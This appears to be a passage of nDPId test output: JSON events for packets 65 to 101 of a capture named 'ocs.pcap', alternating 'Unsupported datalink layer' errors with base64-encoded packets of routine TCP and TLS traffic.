yjb9WzqwHjnucfLntRJ7kBBKSP5MyxB5fV7VO+2Zy+c0W1u6TviKu6GS66YmZPX3jXZfG0cykmnMz0S4FlsKxOTa1Yx3NAm9T5Wl\/3vF1X5eWyDGnzsO+edDsDJ9kN9y6nabqEXlG5KC89KM1ZBlzZ10Ik1lrZL\/SZ9RgGdpyG5+5BVrNDtVt8CqjUFlhh0iPLmg8HCCsvYiGDqCnVpuRNJwMiosNrFgyET4X1hHRepmhhNXvwu4Qf6IAM2WawyWyv4pYZx3efCBs83d4aXbOAMcRfVbJTkgxGU+gMvVq5rbp6GNKJoNc6f+zc80sXKmsKuY5wt77rMM9v4JYoqNnmBFncKCL6Ng0a2PnnEAIO31mA0o\/ifRYPteknDNo5nlEz2aXdYmHJs4wG\/SuXR4sz6OMT6LN\/Eadhvy2u7JhV2SQ9km5b32sZj8uYP2yv8rNJKdoiRfRt46VXFWt81V+IgClSSM0fNU8Ti\/D5L1JfzK4tFsI1sur9SJYtyMs6NKuYaUJeW5UMaj39qgEBwxum7p6wiMkiVbN+gEBVK\/A3vE7yeuC+bRdbgrGTGgkMGdAPzr0mm30SitWMlLdWYINu6\/RrVhqCEa72XcjhxGj2C+0IKZi+IpFa2NGGkp9kguNVD8enFsjjMFw7IIVrRzFs1D8vh5M5iLVEOt7frnVgirg2s9OI52Kh3Cuii2eWl2WyIbOpl3E\/\/wy9+FEZ4+EDVAtT0LmnHECSASuoLCZHSYz5T2g3SnsjRHchtRfzlOlm2x3z91NieOza1cMuS61sXMExHzhMFqqwv4DbJqC\/c3oZ1tsBsA57rhz2acm4we6SjUJQo7hdOGs+SmZl58\/Q\/T7mVWciR+e8og4Yah7wL45\/xTgiAOfG979HIK6P2gI9IpbxZzGdiQYQwSes1V6IjBQxvxVfsRQqH1oCrSGrGuHTX5VQGbEbuAlMAJ39JXNwjKCi2nmdUDmqfi\/eCXYppjGRK9r5YUyNq\/czKuW\/tLmMgNmUeVl5oiD6ygEpTWQ+Cu1611AbpqSwsCNkMFsQwE1hENEJtXtmUOQfv3mKIer0C+MpPNBaMGcci9tEBvOPQnOtw\/iu5e+o+uUDY5reGZ0v4wbdjWI7"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":65,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788398} -00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":65,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":80,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":80,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAUMDhQABABoHswKi0ArL40DbC2QBQ64tGkd7mVuTwEADlLGgAAAEBCAoANYNMRwX+CwEBBRre5ojX3uaOQ97mZyje5nIA3uZcUN7mYbw="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":66,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788400} -00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":66,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMDiQABABoHzwKi0ArL40DbC2QBQ64tGkd7mVuTQEADl0yoAAAEBCAoANYNMRwX+CwEBBRLe5lxQ3uZyAN7miNfe5o5D"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":67,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788467} -00600{"packet_event_id":1,"packet_event_name":"packet","packet_id":67,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":260,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":260,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQABBDlpQABABgixwKi0ArL40DaPSAG7xoy6Sjpn3PmAGADlC+8AAAEBCAoANYNTRwX+ERYDAQDLAQAAxwMBVmhd83GqZqYQO3oMbwUHPK3VU0gJzqNSdwnP4gncj8QAAEYABAAFAC8ANcACwATABcAMwA7AD8AHwAnACsARwBPAFAAzADkAMgA4AArAA8ANwAjAEgAWABMACQAVABIAAwAIABQAEQD\/AQAAWAAAABQAEgAAD29jcy5sYWJnZW5jeS53cwALAAQDAAECAAoANAAyAAEAAgADAAQABQAGAAcACAAJAAoACwAMAA0ADgAPABAAEQASABMAFAAVABYAFwAYABk="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":68,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788471} -00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":68,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMDjQABABoHywKi0ArL40DbC2QBQ64tGkd7mVuTQEADlzbcAAAEBCAoANYNTRwX+CwEBBRLe5lxQ3uZ3bN7miNfe5o5D"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":69,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788472} -00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":69,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMDkQABABoHxwKi0ArL40DbC2QBQ64tGkd7mVuTQEADlzJAAAAEBCAoANYNTRwX+CwEBBRLe5lxQ3uZ4k97miNfe5o5D"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":70,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788477} -00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":70,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMDlQABABoHwwKi0ArL40DbC2QBQ64tGkd7mVuTQEADlxyMAAAEBCAoANYNURwX+CwEBBRLe5lxQ3uZ9\/97miNfe5o5D"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":71,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788481} -00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":71,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMDmQABABoHvwKi0ArL40DbC2QBQ64tGkd7mVuTQEADlwbcAAAEBCAoANYNURwX+CwEBBRLe5lxQ3uaDa97miNfe5o5D"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":72,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788512} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":72,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANDlqQABABgmAwKi0ArL40DaPSAG7xoy7Gjpn4mWAEAEShVwAAAEBCAoANYNXRwX+ag=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":73,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788518} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":73,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANDlrQABABgl\/wKi0ArL40DaPSAG7xoy7Gjpn59GAEAE\/f8MAAAEBCAoANYNXRwX+ag=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":74,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788521} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":74,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANDlsQABABgl+wKi0ArL40DaPSAG7xoy7Gjpn7T2AEAFseikAAAEBCAoANYNYRwX+ag=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":75,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788522} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":75,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANDltQABABgl9wKi0ArL40DaPSAG7xoy7Gjpn7\/mAEAGYd0EAAAEBCAoANYNYRwX+ag=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":76,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788523} -00337{"packet_event_id":1,"packet_event_name":"packet","packet_id":76,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMDnQABABoH2wKi0ArL40DbC2QBQ64tGkd7mVuSwEADlq9QAAAEBCAoANYNYRwX+CwEBBQre5lxQ3uaOQw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":77,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788535} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":77,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANCFaQABABqbiwKi0AhcV5seZXwG7KAKpCVpZO+mAEAHi2dsAAAEBCAoANYNal2cLGA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":78,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788595} -00330{"packet_event_id":1,"packet_event_name":"packet","packet_id":78,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPDy5QABABnycwKi0AomHgzS0VhQCr\/++QwAAAACgAjkI02AAAAIEBbQEAggKADWDYAAAAAABAwMG"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":79,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788603} -00369{"packet_event_id":1,"packet_event_name":"packet","packet_id":79,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":89,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":89,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAWSFbQABABqa8wKi0AhcV5seZXwG7KAKpCVpZO+mAGAHi+l8AAAEBCAoANYNgl2cLGBUDAQAgnrF5ZZ6bLaNIscD09wErYOXiKOcK3EQR+1eSLnFX2LU="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":80,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788604} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":80,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANCFcQABABqbgwKi0AhcV5seZXwG7KAKpLlpZO+mAEQHi2a8AAAEBCAoANYNgl2cLGA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":81,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788632} -00743{"packet_event_id":1,"packet_event_name":"packet","packet_id":81,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":366,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":366,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQABbjluQABABghCwKi0ArL40DaPSAG7xoy7Gjpn7\/mAGAGYPNEAAAEBCAoANYNjRwX+ahYDAQEGEAABAgEAMMRmTPsen+2AYa94093E2Vq7hcxeYwMqQEqPqyXCgdPzR6vuUKQz6pVdmHwa79xuMQ8retZcWvvlTKI\/+1N9Gw\/OaFaKf1XNyjpOCZDOqZNC1QfAdJVPLISbx5mvxfQvXpOc3phEJ8CTUkKMOoQ3aJQOpUeTUETGoqRungcuMX0flcpp4eLJBf3TOwuHdOuI3rMCc2MG4Jycx7Z3cRdXP2ZRxnQsrduzGirfTjwCtcfz8aDtqXVLuKvVuhGzRT9h40LMwEboDGuD3+F7F3v0NqpNGHY9wn\/cN+17s3inRcJFU7O9HkHw3yh1R32L3CbW99WKgFGgvhRhnMJ2UVhZWxQDAQABARYDAQAkNvXgz7fHCqM2dlRB6bX8n2EuyIc7MhCF9s2YUBddilHfdTrE"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":82,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788669} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":82,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMDoQABABoIBwKi0ArL40DbC2QBQ64tGkd7mjkOAEAESUisAAAEBCAoANYNnRwX+kg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":83,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788688} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":83,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANDlvQABABgl7wKi0ArL40DaPSAG7xoy8VDpn8CiAEAGYdZoAAAEBCAoANYNpRwX+lw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":84,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788737} -01206{"packet_event_id":1,"packet_event_name":"packet","packet_id":84,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":702,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":702,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQACvjlwQABABgbwwKi0ArL40DaPSAG7xoy8VDpn8CiAGAGY31IAAAEBCAoANYNuRwX+lxcDAQKFLzhkliTvJmiVa3YhExR3D9MDAzF9+33c1h+p25FVP\/QC\/yJASItBOx3fMBZbY6pcwGnm\/8PoxXcRBCTkxJ3OCUHArkSHkNab4QGuPm1FJWeb9HHTA49\/hpdu8FmfXT2x0b3oWNDQYT8WZmStF+K3HEbBNiYKTlAsd\/koYM7SLoU2jQc+B+WSAhSoPqkS85DHiVbsA2hzCgOumpL6QkDkUYTE93eMbY6HO3uunibkAw8pkjzbe7rrpyy07rcdZT4r0NzB\/wc\/0H2J65B+d914bi23jOUGOBm8VAeGAfwqGaTQze1ihF2zuTXIzK7Thoi7SqCuqcFCByNKgJDlrLwW188DP0a492JbHJ+XFSUrF7xChYQP6V80FFq\/7XHj0dWhLOPDM486p0lyO52Wd2ip5i\/uUgSnQ3zhKGKDZv9RywiqfxJwH7iohk2K8AOui0QEIDSN3rFDSCenR9+SGjMg9ZkJs\/8WxklNPs8RUyy91Vi13o\/ziNLgw4i5dDrX\/vBO+TyiZ71Pq21doqxiW3nOJA5SRMR47t108HEfuQk2n7zXSfLEREC1FCQMZFH5eyh2aLLS4\/f3JCdmwyzC0tTh4V7kYhxuRndbQj3AJEw2LzlZhGv2fUVTNiMmN5+chMr59vrozlkDrEWznTayNnrsE69E9r6RV2o24IZSEJx\/WTAzx9DQQD1\/aWRrc3CUvaQLY+QKUkMHG14x2Add1Z5fTpbLemNOXS3DGMBGHgDR\/goXIlipPA5FUs95nuh\/0Xk08hBpEhJiUI+nI3\/TT+0xhhD0EHwEcwCz\/EFSmSnRcjQC1sJU9fD42Th6pvQLnU99Bua2FpItOa2gF0aqrxRgi6090OFj"} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":85,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788739} -01162{"packet_event_id":1,"packet_event_name":"packet","packet_id":85,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":667,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":667,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQACmzlxQABABgcSwKi0ArL40DaPSAG7xoy+3jpn8CiAGAGYptEAAAEBCAoANYNuRwX+lxcDAQJiKOTPFbSB4Jg790Ua+XImPPQ60FyTYwPHLmrAbl33MPZn88jonG6eefW\/w8Rw9YqdGuqNYwOkviljbPa+zoX\/ZKY6k9Jn7liLFSo3Od3N7BSpbNbcG1Kpg7OxUICaZ2maEViZEYv9v3By8kF9UcHK+FKBm+DjBibOue25pxD4GkcS7rzEL8PmSj5IwYfDl\/u8UnC9IG0wAh4K4LlelesH7MBifuirR9CHNiZaHt\/0BeIfMS\/S+jxwV\/q5reDLX+I5YDDLET5aaUagd0r0LsbX4tBDJ404JcsMRW4YTulXeRllSSAHaOjo32h9Q+WCHNNjZgq9Qxe3WXwU\/CUiKK3AZ2MsJD\/NHF0f5GP\/uLGrpFN32SHXaHfUd01zsHmU6DWEpk+qG+dWV9Tcj7A5pZuqDcXKC+GCxX386fRTPG4mO3ueioq3+dE8ZGCwfL2DFQgSY1CcZ2qho0s1MZAkQ2Wz\/yAqxyl0xCkZdnVgq8y4O0u7AmM2addeuOMjZhop+iYkC8okrenaP9qUBaxsp2rFpyu+Kp9\/1updhypVQsqZ8ix0oT3hIGcCRjQuNNgN6SaEVzTWwavb7sRIhkPo9\/rXJeMiIAwsxlLen8zj0yk\/dg6cQx4HD0Pk4ifpIqlPYRMNEJDyQNDsLinAvU5Y0gsnLtMEIeHT8IcouklYQcBPdqMDdqE3GPT88dZdAVnpYVyqwtNdv94WNG\/ivWIUmfyC1e8TiINcQ6\/Ref\/WBZJHn9Wz+SVibx9hglnfeU\/\/z1iqUnADQdY91uiDm0xa59wVRYE\/HnY+AyT4aHizWB4qxgyXsw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":86,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788760} -00337{"packet_event_id":1,"packet_event_name":"packet","packet_id":86,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMDpQABABoH0wKi0ArL40DbC2QBQ64tGkd7mjkOwEAESMXIAAAEBCAoANYNwRwX+kgEBBQre5pOv3uaZGw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":87,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788766} -00305{"packet_event_id":1,"packet_event_name":"packet","packet_id":87,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":40,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":40,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAKAAAQABABshIwKi0AhcV5seZXwG7KAKpLgAAAABQBAAA0Q0AAA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":88,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788767} -00305{"packet_event_id":1,"packet_event_name":"packet","packet_id":88,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":40,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":40,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAKAAAQABABshIwKi0AhcV5seZXwG7KAKpLwAAAABQBAAA0QwAAA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":89,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788831} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":89,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMDqQABABoHzwKi0ArL40DbC2QBQ64tGkd7mjkOwEAESK\/8AAAEBCAoANYN3RwX+kgEBBQre5pOv3uaehw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":90,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788908} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":90,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMDrQABABoHywKi0ArL40DbC2QBQ64tGkd7mjkOwEAESJosAAAEBCAoANYN\/RwX+kgEBBQre5pOv3uaj8w=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":91,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788909} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":91,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANDlyQABABgl4wKi0ArL40DaPSAG7xozBRTpn8qGAEAHDbb8AAAEBCAoANYN\/RwX+xw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":92,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788972} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":92,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMDsQABABoH9wKi0ArL40DbC2QBQ64tGkd7mo\/OAEAE\/O+cAAAEBCAoANYOFRwX+2w=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":93,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652788975} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":93,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMDtQABABoH8wKi0ArL40DbC2QBQ64tGkd7mqV+AEAFsNk0AAAEBCAoANYOGRwX+2w=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":94,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652789056} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":94,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMDuQABABoH7wKi0ArL40DbC2QBQ64tGkd7mrsuAEAGaMJsAAAEBCAoANYOORwX+6w=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":95,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652789058} -00321{"packet_event_id":1,"packet_event_name":"packet","packet_id":95,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMDvQABABoH6wKi0ArL40DbC2QBQ64tGkd7mtDeAEAHHKwAAAAEBCAoANYOORwX+7Q=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":96,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652789144} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":96,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMDwQABABoHtwKi0ArL40DbC2QBQ64tGkd7mtDewEAHHvl8AAAEBCAoANYOWRwX+7QEBBQre5rmj3ua\/Dw=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":97,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652789144} -00337{"packet_event_id":1,"packet_event_name":"packet","packet_id":97,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMDxQABABoHswKi0ArL40DbC2QBQ64tGkd7mtDewEAHHuPMAAAEBCAoANYOWRwX+7QEBBQre5rmj3ubEew=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":98,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652789212} -00337{"packet_event_id":1,"packet_event_name":"packet","packet_id":98,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMDyQABABoHrwKi0ArL40DbC2QBQ64tGkd7mtDewEAHHs4AAAAEBCAoANYOdRwX+7QEBBQre5rmj3ubJ5w=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":99,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652789244} -00337{"packet_event_id":1,"packet_event_name":"packet","packet_id":99,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMDzQABABoHqwKi0ArL40DbC2QBQ64tGkd7mtDewEAHHrhEAAAEBCAoANYOgRwX+7QEBBQre5rmj3ubPUw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":100,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652789287} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":100,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMD0QABABoH1wKi0ArL40DbC2QBQ64tGkd7mz1OAEAH0D2UAAAEBCAoANYOlRwX\/KA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":101,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652789672} 